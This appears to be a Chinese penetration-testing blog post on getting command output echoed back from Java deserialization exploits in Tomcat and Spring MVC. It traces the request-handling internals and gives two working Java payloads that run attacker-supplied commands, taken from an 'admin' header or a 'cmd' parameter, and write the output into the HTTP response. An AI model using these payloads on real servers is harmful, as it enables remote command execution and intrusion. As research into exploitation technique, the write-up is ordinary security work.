这是 酒仙桥六号部队 的第 68篇文章。 全文共计2194个字,预计阅读时长8分钟。 概述
JAVA反序列化漏洞是JAVA中最常见的可以直接获取目标权限的漏洞,通过反序列化回显的思路也是越来越多,如通过远程加载回显、在目标网站写文件、通过URLClassLoader回显、借助dnslog回显等。这些思路多少都有些瓶颈。一旦遇到了目标因网络策略严格无法出网,则需要借助Dnslog的打法效果会失效。如果可以直观的返回命令执行结果,那岂不是更香? 知识点
Tomcat处理流程在tomcat自己实现的Servlet处打断点,观察tomcat调用栈大致执行流程:
JAVA反序列化基于常见框架_中间件回显方案
调用过程可以直接用下图直观显示:
JAVA反序列化基于常见框架_中间件回显方案
Connector用于接收请求并将接收的请求封装为Request和Response来具体处理,Connector实现流程大致为:Acceptor用于监听请求,并在Handler处接收Socket,Endpoint用来处理底层Socket的网络连接,Processor用于将Endpoint接收到的Socket封装成Request,Adapter用于将Request交给Container进行具体的处理。 SpringMVC处理流程 SpringMVC中通过DispatcherServlet对http请求做初始化操作,在讲回显思路之前,先一讲下有SpringMVC框架和无框架下Tomcat的request以及response处理容器关系图。 Tomcat 普通的一个Servlet 的类的继承与实现关系:
JAVA反序列化基于常见框架_中间件回显方案
首先通过web.xml配置servlet的处理类为DispatcherServlet,所有的请求都在这个类中处理。
JAVA反序列化基于常见框架_中间件回显方案
我们看一下DispatcherServlet的继承与实现关系:
JAVA反序列化基于常见框架_中间件回显方案
可以发现,Spring本质就是一个做了增强功能的Servlet,对比Tomcat,分别是增加了HttpServletBean,FrameworkServlet以及DispatcherServlet(web.xml配置的Servlet),根据当我们的请求到达SpringMVC,会通过DispatcherServlet处理,根据多态的特点,会优先调用springmvc框架增强实现的Servlet的方法进行请求处理以及Spring bean容器初始化等一系列操作,再之后就可以通过注解RequestMapping的方式进行对请求路由进行处理。 通用回显思路
既然知道了框架中的请求处理流程,那么回显思路也非常清晰了: 明确了回显思路,下面将介绍如何从spring/tomcat中找到我们想要的公共变量,并完成回显。 基于Tomcat回显方案
当反序列化触发时,无法像普通的Filter/Servlet一样,直接获取到Request与Response对象。因此,必须另想办法拿到这些对象,完成命令获取以及回显。 我们在本地启动一个webapp,打上断点进行调试,根据调用栈一路向上跟踪至req和res对象初始化的类Http11Processor。它的构造函数如下:
JAVA反序列化基于常见框架_中间件回显方案
Http11Processor父类AbstractProcessor的构造函数中,初始化了Request与Response对象:
JAVA反序列化基于常见框架_中间件回显方案
在AbstractProcessor中可以通过getRequest获取当前req:
JAVA反序列化基于常见框架_中间件回显方案
在Request中有getResponse方法:
JAVA反序列化基于常见框架_中间件回显方案
如果想返回内容,则调用链路为: Http11Processor.getRequest() -> Request.getResponse() ->Response.doWrite()
JAVA反序列化基于常见框架_中间件回显方案
那么如何获取Http11Processor?通过调用栈可以发现,AbstractProtocol处调用了createProcessor:
JAVA反序列化基于常见框架_中间件回显方案
JAVA反序列化基于常见框架_中间件回显方案
接下来就是如何获取processor,向上跟踪发现AbstractProtocol中process初始化了process:
JAVA反序列化基于常见框架_中间件回显方案
如果processor为空,则创建processor,并且将调用register方法注册,跟进register。 此处有两处分别进行了注册动作,一次是注册到当前线程变量global中,另一次则是注册到tomcat服务器的register注册表中:
JAVA反序列化基于常见框架_中间件回显方案
接下来的思路则是获取Registry注册进去的RequestInfo。在Registry类中可以看到提供了getMBeanServer方法,返回一个MBeanServer对象:
JAVA反序列化基于常见框架_中间件回显方案
断点打在第233行,经调试发现运行状态下这个MBeanServer的实现类是JmxMBeanServer,类的实现关系如下:
JAVA反序列化基于常见框架_中间件回显方案
在JmxMBeanServer发现变量mbsInterceptor为实际存储MBean的变量:
JAVA反序列化基于常见框架_中间件回显方案
再次断点调试,发现mbsInterceptor的实现类为DefaultMBeanServerInterceptor:
JAVA反序列化基于常见框架_中间件回显方案
在Repository可以找到一个query方法,能够返回一个查询列表:
JAVA反序列化基于常见框架_中间件回显方案
所以最终的调用思路为: 1 从Registry中获取到所有已注册的Http11Processor。 2 根据Request请求头中我们自己定义的字段去找到当前的Processor。 3 从当前的Processor获取到对应的Request对象。 4 执行系统命令,写入到Request.getResponse。 主要代码: ArrayList processors = (ArrayList) field.get ( resource );
field = Class.forName ( "org.apache.coyote.RequestInfo" ).getDeclaredField ( "req" );
field.setAccessible ( true );
for (int i = 0; i < processors.size (); i++) {
Request request = (Request) field.get ( processors.get ( i ) );
String header = request.getHeader ( "admin");
if (header != null && !header.equals ( "" )) {
String[] cmds = new String[]{"/bin/bash", "-c", header};
InputStream in = Runtime.getRuntime ().exec ( cmds ).getInputStream ();
Scanner s = new Scanner ( in ).useDelimiter ( "\a" );
String out = "";
while (s.hasNext ()) {
out += s.next ();
}
byte[] buf = out.getBytes ();
ByteBuffer byteBuffer = ByteBuffer.wrap ( buf );
request.getResponse ().doWrite ( byteBuffer );
request.getResponse ().getBytesWritten ( true );
}
}
运行效果:
JAVA反序列化基于常见框架_中间件回显方案
基于Spring MVC的回显方案
在Spring MVC框架中,我们可以通过Spring RequestContextHolder直接获取请求信息,比tomcat的方案要简单许多。 debug一个Spring MVC程序,将断点设置在get请求方法上。跟踪断点处的调用栈可以发现,FrameworkServlet继承了HttpServletBean,并且调用了processRequest方法对request和response进行处理。
JAVA反序列化基于常见框架_中间件回显方案
下一步来到FrameworkServlet类,它调用自身initContextHolders方法,将保存了Request与Response对象的requestAttributes,设置到一个线程变量中:
JAVA反序列化基于常见框架_中间件回显方案
继续跟进initContextHolders,观察到requestAttributes在513行被引用:
JAVA反序列化基于常见框架_中间件回显方案
跟进到RequestContextHolder中的setRequestAttributes方法,可以看到变量被赋值到RequestContextHolder类的requestAttributesHolder静态成员中。也就是说,通过查询这个成员的内容,我们就能获取到当前线程中的Request与Response对象:
JAVA反序列化基于常见框架_中间件回显方案
观察RequestAttributesHolder类,发现可以直接通过调用对应的get方法获取requestAttributes对象:
JAVA反序列化基于常见框架_中间件回显方案
整理思路如下: 具体实现代码如下: HttpServletRequest httprequest =((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getRequest();
HttpServletResponse httpresponse = ((ServletRequestAttributes) RequestContextHolder.getRequestAttributes()).getResponse();
String resHeader=httprequest.getParameter ( "cmd" );
java.io.InputStream in = java.lang.Runtime.getRuntime().exec(resHeader).getInputStream();
BufferedReader br = null;
br = new BufferedReader (new InputStreamReader (in, "GBK"));
String line;
StringBuilder sb = new StringBuilder();
while ((line = br.readLine()) != null) {
sb.append(line);
sb.append("");
}
java.io.PrintWriter out = new java.io.PrintWriter(httpresponse.getOutputStream());
out.write(sb.toString ());
out.flush();
out.close();
搭建一个简单的环境测试:
JAVA反序列化基于常见框架_中间件回显方案
搭建简单的反序列化环境测试:
JAVA反序列化基于常见框架_中间件回显方案
总结
无论是中间件还是使用的web框架,在反序列化回显方面其共同特点都是寻找存储request以及response的类或变量 。只不过tomcat的变量传递和调用更为底层,寻找过程较为复杂;spring调用栈更靠后一些,获取request以及response链路稍微简单一些,整体思路大同小异。 参考链接: https://xz.aliyun.com/t/7535
[url]https://www.codercto.com/a/112362.html[/url]
[url]https://mp.weixin.qq.com/s/-ODg9xL838wro2S_NK30bw[/url]
[url]https://mp.weixin.qq.com/s?__biz=MzIwNDA2NDk5OQ==&mid=2651374294&idx=3&sn=82d050ca7268bdb7bcf7ff7ff293d7b3[/url]
|